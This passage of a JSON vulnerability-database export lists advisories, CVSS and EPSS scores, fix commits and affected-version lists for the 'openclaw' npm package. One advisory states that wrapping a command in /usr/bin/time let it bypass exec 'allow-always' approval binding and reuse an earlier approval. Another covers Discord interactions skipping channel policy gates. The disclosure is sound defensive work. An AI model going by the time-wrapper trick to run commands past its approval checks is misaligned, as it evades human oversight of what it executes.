ility":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42428","GHSA-3vvq-q2qc-7rmp"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cbuu-4d6c-rben"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90976?format=json","vulnerability_id":"VCID-cjjd-hv92-wbfn","summary":"OpenClaw's system.run allowlist can be bypassed through an unregistered time dispatch wrapper\n## Summary\nAllow-always exec approvals did not unwrap /usr/bin/time, so an unregistered time wrapper could bypass executable binding and reuse approval state for the inner command.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `39409b6a6dd4239deea682e626bac9ba547bfb14`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/dispatch-wrapper-resolution.ts now unwraps /usr/bin/time and binds approvals to the real inner executable.\n- src/infra/exec-approvals-allow-always.test.ts ships regression coverage for time-wrapper allow-always approval bypasses.\n\nOpenClaw thanks @YLChen-007 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35666","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18733","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18773","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35666"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35666","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35666"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-13T17:38:28Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper"},{"reference_url":"https://github.com/advisories/GHSA-qm9x-v7cx-7rq4","reference_id":"GHSA-qm9x-v7cx-7rq4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qm9x-v7cx-7rq4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35666","GHSA-qm9x-v7cx-7rq4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cjjd-hv92-wbfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90868?format=json","vulnerability_id":"VCID-csnc-r6fv-j3en","summary":"OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement\n## Summary\n\nDiscord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages.\n\n## Impact\n\nUsers could trigger privileged component actions from contexts that should have been blocked by Discord channel policy.\n\n## Affected Component\n\n`extensions/discord/src/monitor/agent-components.ts`\n\n## Fixed Versions\n\n- Affected: `>= 2026.2.14, <= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `511093d4b3` (`Discord: apply component interaction policy gates`).","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/511093d4b37c0831c778fabd25ec3020834983c3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jp4j-q5fc-58gv"},{"reference_url":"https://github.com/advisories/GHSA-jp4j-q5fc-58gv","reference_id":"GHSA-jp4j-q5fc-58gv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jp4j-q5fc-58gv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-j